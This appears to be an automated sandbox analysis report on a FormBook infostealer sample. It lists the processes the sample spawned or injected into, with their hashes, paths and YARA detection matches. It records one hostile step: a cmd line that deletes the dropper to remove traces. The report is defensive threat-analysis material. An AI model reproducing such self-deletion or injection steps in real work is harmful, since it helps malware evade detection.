                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Antivirus matches:
                  • Detection: 46%, ReversingLabs
                  Reputation:low

                  General

                  Target ID:2
                  Start time:13:07:16
                  Start date:14/05/2022
                  Path:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
                  Imagebase:0x3b0000
                  File size:80384 bytes
                  MD5 hash:0A3F789C1F124B76E2EDC74EBEACF70A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Target ID:5
                  Start time:13:07:23
                  Start date:14/05/2022
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff6b8cf0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  General

                  Target ID:16
                  Start time:13:07:49
                  Start date:14/05/2022
                  Path:C:\Windows\SysWOW64\chkdsk.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\chkdsk.exe
                  Imagebase:0x1040000
                  File size:23040 bytes
                  MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:moderate

                  General

                  Target ID:17
                  Start time:13:07:54
                  Start date:14/05/2022
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"
                  Imagebase:0xc20000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:19
                  Start time:13:07:55
                  Start date:14/05/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7c9170000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  No disassembly